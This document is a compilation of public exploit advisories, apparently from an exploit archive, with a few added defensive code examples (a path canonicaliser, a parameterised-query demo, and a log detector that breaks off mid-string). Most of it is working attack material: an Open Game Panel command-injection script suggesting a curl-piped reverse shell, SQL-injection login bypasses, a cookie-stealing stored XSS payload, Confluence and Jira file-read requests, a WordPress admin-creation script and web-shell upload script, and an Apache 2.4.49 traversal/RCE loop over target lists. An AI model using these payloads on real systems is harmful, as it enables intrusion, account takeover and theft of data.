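"""Added example (not Payara code): canonicalise request targets before matching
protected directories, and flag traversal attempts in access logs."""
import posixpath
import re
from urllib.parse import unquote

# Directories a servlet container must never serve directly.
PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")

# Common Log Format: client, method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log; the second line is the request from the steps above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.5 - - [01/Oct/2021:10:00:01 +0000] "GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1" 200 891
10.0.0.9 - - [01/Oct/2021:10:00:02 +0000] "GET /%2e%2e/WEB-INF/web.xml HTTP/1.1" 404 0
10.0.0.7 - - [01/Oct/2021:10:00:03 +0000] "GET /app/web-info/ HTTP/1.1" 200 100
"""


def canonical_path(raw_target):
    """Decode and collapse an origin-form request target: percent-decoding
    (repeated, to catch double encoding), backslashes, '.' and '..' segments
    and runs of '/'. This is the form the access decision must be made on."""
    path = raw_target.split("?", 1)[0].split("#", 1)[0]
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    path = path.replace("\\", "/")
    path = "/" + path.lstrip("/")          # posixpath keeps a leading '//'; collapse it
    norm = posixpath.normpath(path)
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def is_protected(raw_target):
    """True if the canonical form of raw_target lands inside a protected directory.
    Case-insensitive on purpose, so the answer does not change on a case-insensitive filesystem."""
    norm = canonical_path(raw_target).upper()
    return any(norm.startswith(p) or norm == p.rstrip("/") for p in PROTECTED_PREFIXES)


def suspicious_requests(log_text):
    """(client, raw target) for every request whose raw target is not already
    canonical and whose canonical form is protected, i.e. the traversal attempts."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        if target != canonical_path(target) and is_protected(target):
            hits.append((client, target))
    return hits


if __name__ == "__main__":
    for client, target in suspicious_requests(SAMPLE_LOG):
        print(client, target, "->", canonical_path(target))
```

A plain `GET /WEB-INF/web.xml` is not reported by `suspicious_requests`, since the container already refuses the canonical form; the scan is after the encodings that get past that check.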
-
Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intext:"Open Game Panel 2021"
# Date: 08/14/2021
# Exploit Author: prey
# Vendor Homepage: https://www.opengamepanel.org/
# Software Link: https://github.com/OpenGamePanel/OGP-Website
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
# Tested on: CentOS Linux 5.4.102

# Before the patch, it was possible to inject system commands through the "map" parameter
# when launching a new Counter-Strike server, just by putting the command between ';'.
# The user needs to be authenticated for this.

import requests

banner = """
Open Game Panel - Remote Code Execution (RCE) (Authenticated)

## You can get mod_id and home_id from your game panel URL when you are logged in
"""
print(banner)

target = input("Target url: (eg: https://panel.example.org)\n")
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
mod_id = input("Mod_id value: (eg: 2437)\n")
home_id = input("Home_id value: (eg: 3737)\n")
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")

url = target + "/home.php?m=gamemanager&p=game_monitor"
cookies = {"opengamepanel_web": opengamepanel_web}   # authenticated panel session
headers = {"Content-Type": "application/x-www-form-urlencoded"}
# The "map" value is placed in the server start command line unescaped; wrapping the
# payload in ';' ends the intended command and runs ours where the game server is started.
data = {
    "mod_id": mod_id,
    "home_id": home_id,
    "ip_port": server_ip_port,
    "map": ";" + command + ";",
    "start_server": "whatever",
}

try:
    requests.post(url, headers=headers, cookies=cookies, data=data)
except requests.RequestException:
    print("Something went wrong, check your inputs or try manually exploiting the map parameter")

print("Finished. You can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")
-
Lodging Reservation Management System 1.0 - Authentication Bypass
# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass
# Date: 2021-09-20
# Exploit Author: Nitin Sharma(vidvansh)
# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server
# Description : The username and password inputs of the admin login are not sanitised, which allows an SQL injection authentication bypass and leads to access to unauthorised accounts.

# Steps-To-Reproduce:

Step 1 – Go to the product admin panel http://localhost/lodge/admin/login.php.
Step 2 – Enter anything in username and password.
Step 3 – Click on Login and capture the request in Burp Suite.
Step 4 – Change the username to ' OR 1 -- - and the password to ' OR 1 -- -.
Step 5 – Click Forward and you will be logged in as admin.

# PoC:

POST /lodge/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/lodge/admin/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+

# Authentication Bypass:
# Go to the admin login page (http://localhost/lodge/admin/login.php), then use the payload below as username and password:

Username: ' or 1 -- -
Password: ' or 1 -- -
-
Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-02
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Steps-To-Reproduce:
Step 1 – Go to the admin panel http://localhost/bsenordering/admin/login.php
Step 2 – Enter the default admin username janobe and enter password test
Step 3 – Click on Sign in and capture the request in Burp Suite
Step 4 – Change the user_email to janobe' or '1'='1
Step 5 – Click forward and now you will be logged in as an admin.

POC

POST /bsenordering/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/login.php
Cookie: PHPSESSID=him428198e798r23eagi9mapjk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

user_email=janobe' or '1'='1&user_pass=test&btnLogin=
-
Student Quarterly Grading System 1.0 - SQLi Authentication Bypass
# Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass
# Date: 04.10.2021
# Exploit Author: Blackhan
# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Student Quarterly Grading System v1.0 login page can be bypassed with a simple SQLi in the username parameter.

Steps To Reproduce:
1 - Go to the login page http://localhost/grading_system/login.php
2 - Enter the payload "bypass' or 1=1-- -" (without double quotes) in the username field and type anything in the password field.
3 - Click on the "Login" button and you are logged in as administrator.

PoC

POST /grading_system/Actions.php?a=login HTTP/1.1
Host: localhost
Content-Length: 45
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/grading_system/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j
Connection: close

username=bypass'+or+1%3D1--+-&password=bypass
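The three authentication bypasses above (Lodging Reservation, E-Negosyo and Student Quarterly Grading) all come from the same defect: the login query is built by string concatenation, so a quote in the username closes the literal and `or 1=1` rewrites the WHERE clause. The following is an added example, not code from any of the advisories or the vendor, that reproduces the defect against an in-memory SQLite table with a constructed account and shows that a parameterised query returns nothing for the same payloads; the table layout and the SHA-256 password storage are assumptions (the apps themselves use md5()).

```python
import hashlib
import sqlite3

# Constructed sample account; not data from any of the advisories above.
ADMIN_USER = "admin"
ADMIN_PASS = "correct-horse-example"


def _hash(password):
    # Hash choice is irrelevant to the bypass; the apps use md5(), this uses SHA-256.
    return hashlib.sha256(password.encode()).hexdigest()


def build_db():
    """In-memory SQLite users table standing in for the apps' admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        (ADMIN_USER, _hash(ADMIN_PASS)),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-concatenated query, the pattern behind the three bypasses above.

    Returns the matched (id, username) row, or None.
    """
    sql = (
        "SELECT id, username FROM users WHERE username = '" + username
        + "' AND password = '" + _hash(password) + "'"
    )
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error:
        # A malformed injection produces a SQL error instead of a login.
        return None


def login_safe(conn, username, password):
    """Parameterised query: user input can never change the statement's shape."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, _hash(password))).fetchone()


# The payloads quoted in the advisories above, used verbatim as the username.
PAYLOADS = ["' OR 1 -- -", "bypass' or 1=1-- -"]


def compare(payload, password="anything"):
    """Return (vulnerable_result, safe_result) for one payload."""
    conn = build_db()
    return (
        login_vulnerable(conn, payload, password),
        login_safe(conn, payload, password),
    )


if __name__ == "__main__":
    for p in PAYLOADS:
        vuln, safe = compare(p)
        print(f"{p!r:24} concatenated -> {vuln}   parameterised -> {safe}")
    print("real credentials, parameterised ->",
          login_safe(build_db(), ADMIN_USER, ADMIN_PASS))
```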
-
Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-03
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.

Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add
Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script>
Step 3 - Save the product. The stored XSS triggers for all users that navigate to the home page.

POC

POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743
Content-Length: 1203
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/products/index.php?view=add
Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERNAME"

Test
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERPHONE"

0000000000
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PRODESC"

<script>alert(document.cookie)</script>
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="CATEGORY"

3
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="ORIGINALPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROQTY"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="save"


-----------------------------375756297829058981022228786743--
-
Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read
# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26085

POC #1 - web.xml

GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #2 - seraph-config.xml

GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #3 - pom.properties

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #4 - pom.xml

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
-
Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/thecartpress/
# Date: 04/10/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugin/thecartpress
# Version: <= 1.5.3.6
# Tested on: Ubuntu 20.04.1

import sys
import requests


def print_banner():
    print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
    print("Author -> space_hen (www.github.com/spacehen)")


def print_usage():
    print("Usage: python3 exploit.py [target url]")
    print("Ex: python3 exploit.py https://example.com")


def vuln_check(uri):
    # A bare request to the AJAX action answers with a validation message when
    # the action is reachable without authentication.
    response = requests.get(uri)
    raw = response.text
    return "User name is required" in raw


def main():
    print_banner()
    if len(sys.argv) != 2:
        print_usage()
        sys.exit(1)
    base = sys.argv[1]
    ajax_action = 'tcp_register_and_login_ajax'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action
    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)
    # The role is taken from the request body without a capability check.
    data = {
        "tcp_new_user_name": "admin_02",
        "tcp_new_user_pass": "admin1234",
        "tcp_repeat_user_pass": "admin1234",
        "tcp_new_user_email": "[email protected]",
        "tcp_role": "administrator",
    }
    print("Inserting admin...")
    response = requests.post(uri, data=data)
    if response.text == "\"\"":
        print("Success!")
        print("Now login at /wp-admin/")
    else:
        print(response.text)


main()
-
Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
# Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/mstore-api/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/mstore-api/
# Version: 2.0.6, possibly higher
# Tested on: Ubuntu 20.04.1

import sys
from os import path
import requests


def print_banner():
    print("MStore API < 2.0.6 - Arbitrary File Upload")
    print("Author -> space_hen (www.github.com/spacehen)")


def print_usage():
    print("Usage: python3 exploit.py [target url] [shell path]")
    print("Ex: python3 exploit.py https://example.com ./shell.php")


def vuln_check(uri):
    # An empty POST to the REST route answers with a validation message when
    # the route is exposed.
    response = requests.post(uri)
    raw = response.text
    return "Key must be" in raw


def main():
    print_banner()
    if len(sys.argv) != 3:
        print_usage()
        sys.exit(1)
    base = sys.argv[1]
    file_path = sys.argv[2]
    rest_url = '/wp-json/api/flutter_woo/config_file'
    uri = base + rest_url
    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)
    if not path.isfile(file_path):
        print("(*) Invalid file!")
        sys.exit(1)
    # Open in binary mode so the upload is byte-exact.
    with open(file_path, "rb") as fh:
        files = {'file': ("config.json.php", fh, "application/json")}
        print("Uploading shell...")
        response = requests.post(uri, files=files)
    # response should be location of file
    print(response.text)


main()
-
Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26086

POC File #1 - web.xml

GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #2 - seraph-config.xml

GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #3 - decorators.xml

GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #4 - /jira-webapp-dist/pom.properties

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #5 - /jira-webapp-dist/pom.xml

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #6 - /atlassian-jira-webapp/pom.xml

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC File #7 - /atlassian-jira-webapp/pom.properties

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
-
Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
# Date 04.10.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://forum.ait-pro.com/read-me-first/
# Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip
# Version: <= 5.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-39327
# CWE: CWE-200
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md

'''
Description:
The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.
'''

import argparse
import requests

'''
Banner:
'''
banner = '''
 ______ _______ ____ ___ ____ _ _____ ___ _________ _____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ // _ \___ /___ \___ | | | \ \ / /| _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / / | |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / / \____| \_/ |_____| |_____|\___/_____|_| |____/ /_/____/_____/_/
* Sensitive information disclosure
@ Author: Ron Jost
'''
print(banner)

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH

print('')
print('[*] Starting Exploit:')
print('')

# Both locations where the plugin writes the publicly readable backup log
paths = [
    "/wp-content/bps-backup/logs/db_backup_log.txt",
    "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt",
]

# Exploit
for pathadd in paths:
    x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd)
    print(x.text)
-
Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions - odinesolutions.com
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 LTS
# Description: The vulnerability allows an attacker to inject SQL commands through the 'trafficCycle' parameter of the search section.
# This vulnerability was discovered during a penetration test and has since been fixed.

====================================================

# PoC : SQLi :

GET /rass/api/v1/trafficCycle/98 HTTP/1.1
Host: 192.168.1.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Origin: https://192.168.1.25
Connection: close
Referer: https://192.168.1.25

Parameter: #1* (URI)
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
---
web application technology: Nginx
back-end DBMS: PostgreSQL
====================================================
-
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

# Both the target list and the path are required
if [[ $1 == '' ]] || [[ $2 == '' ]]; then
    echo "Set [TARGET-LIST.TXT] [PATH] [COMMAND]"
    echo "./PoC.sh targets.txt /etc/passwd"
    exit
fi

# --path-as-is keeps the encoded dot segments that 2.4.49 fails to normalise
for host in $(cat "$1"); do
    echo "$host"
    curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"
done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami
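From the defender's side, both this entry's request and the Confluence (CVE-2021-26085) and Jira (CVE-2021-26086) requests above have a recognisable shape in access logs: percent-encoded dot segments that decode to `..`, and a `;` path parameter placed in front of `WEB-INF` or `META-INF`. The following is an added detection example, not code from any of the advisories, that normalises request paths the way a lenient server would and flags both shapes; the log lines are constructed in Apache combined format and the protected-directory list is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache "combined" format), not captured traffic.
# Line 2 mirrors this entry's request shape, lines 3 and 4 the Confluence and Jira
# requests above; lines 1 and 5 are benign and must not be flagged.
SAMPLE_LOG = """\
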